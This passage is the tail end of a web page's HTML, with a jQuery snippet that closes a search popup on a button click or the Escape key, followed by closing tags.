    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
